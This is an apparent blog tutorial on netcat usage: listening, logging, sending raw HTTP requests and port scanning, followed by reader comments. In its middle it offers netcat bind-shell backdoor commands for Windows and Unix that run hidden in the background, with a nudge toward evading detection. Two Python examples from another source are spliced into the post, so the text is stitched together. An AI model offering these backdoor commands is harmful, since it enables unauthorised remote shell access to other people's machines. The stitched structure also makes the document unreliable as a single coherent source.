Jul 19

This is kind of a simple tip, but it's a useful one. If you need to send data to a server to see how it reacts, or need to receive data from a server, rather than writing a script, just use NetCat! There are versions of NetCat for Windows, and if your *nix distribution doesn't come pre-installed with NetCat, just get rid of it now.

Basically, to receive data from the server, you just need to put NetCat in listen mode. Do that like this:

nc -l -p 99

That will listen for one connection on port 99 and echo the information received to your terminal. What if you want more than one connection?

nc -L -p 99

The -L (instead of -l) will accept any number of connections, and will only stop listening when you kill it. If you need the data in a file, just redirect the output somewhere:

nc -L -p 99 > ~/log

The -v flag (verbosity) is also recommended. You can use it multiple times for more effect, I usually use 2 or 3. It will give you additional information instead of just the raw data.

nc -L -p 99 -vvv

Now, sending data back to the server. You probably knew all the stuff I already talked about, but this is yet another thing NetCat can do. I'm going to assume you're on Windows (this can be done with bash scripts in *nix just as easily), and I'm going to use a batch file to illustrate my point.
send.bat:

@echo off
echo GET / HTTP/1.1
echo Host: google.com
echo.

Simple, right? This doesn't do much, but it should get us some data from the server. The @echo off line keeps the batch file from echoing the commands themselves into the pipe, and echo. prints the empty line that ends the HTTP header block; without it the server just sits waiting for more headers.

send.bat | nc -v google.com 80

You'll probably want to save the response to a file, which only takes a redirect:

send.bat | nc -v google.com 80 > outfile.html
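To make concrete what the listener from the first section and the send.bat pipe above are doing at the socket level, here is an added Python example (not code from the original post): a one-shot loopback listener that logs whatever it receives, like nc -l -p PORT > file, and a sender that pushes a correctly terminated HTTP/1.1 request, as send.bat is meant to. The host name, the request and the use of port 0 (so the OS picks a free port) are constructed for the example.

```python
import socket
import threading

# Constructed for this example: loopback only, the OS picks the port.
HOST = "127.0.0.1"


def build_request(host, path="/"):
    """Build the minimal HTTP/1.1 request that send.bat is trying to produce.

    HTTP wants CRLF line endings and an empty line after the last header;
    without that blank line the server keeps waiting for more headers.
    Connection: close asks the server to hang up after the response, so a
    raw client (nc or this script) sees EOF instead of a keep-alive stall.
    """
    lines = [
        f"GET {path} HTTP/1.1",
        f"Host: {host}",
        "Connection: close",
        "",   # terminates the header block
        "",   # yields the final CRLF after the join
    ]
    return "\r\n".join(lines).encode("ascii")


def open_listener(port=0):
    """Bind and listen like `nc -l -p PORT`; port 0 lets the OS choose."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((HOST, port))
    srv.listen(1)
    return srv


def log_one_connection(srv, outfile=None):
    """Accept one client, collect everything it sends until EOF, then exit.

    This is the `nc -l -p PORT > file` behaviour: a single connection.
    Returns the received bytes and optionally appends them to outfile.
    """
    conn, _peer = srv.accept()
    received = bytearray()
    with conn:
        while True:
            chunk = conn.recv(4096)
            if not chunk:          # client shut down its write side
                break
            received += chunk
    srv.close()
    if outfile:
        with open(outfile, "ab") as f:
            f.write(received)
    return bytes(received)


def send_bytes(port, payload):
    """Connect and push bytes, like `send.bat | nc HOST PORT`."""
    with socket.create_connection((HOST, port), timeout=5) as s:
        s.sendall(payload)
        s.shutdown(socket.SHUT_WR)  # EOF on our side, as nc does when stdin ends


def round_trip(payload, outfile=None):
    """Run listener and sender on loopback and return what the listener saw."""
    srv = open_listener()
    port = srv.getsockname()[1]
    result = {}
    t = threading.Thread(
        target=lambda: result.update(data=log_one_connection(srv, outfile)),
        daemon=True,
    )
    t.start()
    send_bytes(port, payload)
    t.join(timeout=10)
    return result.get("data", b"")


if __name__ == "__main__":
    req = build_request("example.com")
    got = round_trip(req)
    print(got.decode("ascii"))
    print("listener logged exactly what was sent:", got == req)
```

Running it prints the request exactly as the listener received it. The detail worth noticing is the ending: the two CRLFs after the last header and the Connection: close line are what let a raw client know when the exchange is over, and those are the bytes a plain pair of echo lines does not produce.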

You can also make a backdoor with netcat. Just do something like this:
Windows:

nc -L -e cmd.exe -p 80 -d

*nix:

nc -L -e /bin/sh -p 80 -d > /dev/null &

Each of these effectively sets up a backdoor that runs in the background. It is by no means undetectable, but you can use your imagination there and save yourself the wasted effort of reinventing the wheel by coding yet another bindshell.

NetCat can also function as a (bad) portscanner. I definitely recommend NMAP (http://insecure.org/nmap/) over using NetCat, but you work with what you have. It does have a list of generic services, but they are nowhere near as extensive as those in the NMAP database. Once again, NMAP should come with any good *nix distribution, but if you have to download it, sources are available there and it is probably in your distribution's package manager.

nc -z -vvv 127.0.0.1 1-80
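To see what nc -z is actually doing for each port in that range (one TCP connect with a timeout, nothing more), here is an added Python example, not code from the original post, that checks a range on your own host and separates open, closed and filtered results, a distinction nc's -z output does not make. The loopback host and the throwaway listener it starts for itself are constructed for the example.

```python
import socket

# Constructed for this example: check your own loopback, as nc -z 127.0.0.1 does.
HOST = "127.0.0.1"


def check_port(host, port, timeout=1.0):
    """One TCP connect probe, like `nc -z -w 1 HOST PORT`.

    "open"     : handshake completed, something is listening
    "closed"   : the host answered with a refusal (RST)
    "filtered" : no answer before the timeout, usually something dropping it
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(timeout)
    try:
        s.connect((host, port))
        return "open"
    except ConnectionRefusedError:
        return "closed"
    except OSError:          # includes the timeout error
        return "filtered"
    finally:
        s.close()


def check_range(host, first, last, timeout=1.0):
    """Port-by-port result for first..last inclusive (nc -z HOST first-last)."""
    return {port: check_port(host, port, timeout) for port in range(first, last + 1)}


def listening_ports(host, first, last, timeout=1.0):
    """Just the ports that accepted a connection, sorted."""
    states = check_range(host, first, last, timeout)
    return sorted(p for p, state in states.items() if state == "open")


def hold_open_port():
    """Start a throwaway loopback listener so the checks have something to find.

    Returns (socket, port); close the socket to make the port "closed" again.
    """
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((HOST, 0))
    srv.listen(5)
    return srv, srv.getsockname()[1]


if __name__ == "__main__":
    srv, port = hold_open_port()
    print(f"test listener on {HOST}:{port}")
    for p, state in check_range(HOST, port - 1, port + 1).items():
        print(p, state)
    srv.close()
    print("after closing:", check_port(HOST, port))
```

The timeout is the same job -w does for nc: without it a port that silently drops packets stalls the whole range. Keep it short on a LAN and longer across the Internet, and treat "filtered" as "no answer", not "nothing there".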

Need to use UDP instead of TCP? No problem, just throw in the -u flag. How about telnet? The -t flag takes care of that too. The possibilities are seriously endless. And guess what, you just saved yourself a bunch of time by using NetCat instead of coding your own custom tool to do the same thing in whatever language you choose. See, I really am awesome. :)


3 Responses

  1. DaBestNoob Says:

    Nice, I like the way you showed us how to use it … but I'm still trying to figure out why it doesn't stay open when I press enter lol

  2. mauro Says:

    Hello,
    how can I make a batch file to send to one computer to receive its data?
    And how can I send it?
    Thanks.

    :) great tutorial

  3. admin Says:

    Listening computer:

    nc -L -v -p 5000 -w 5 > out.txt

    Sending computer:

    nc localhost 5000 -w 5 < sfasd.txt
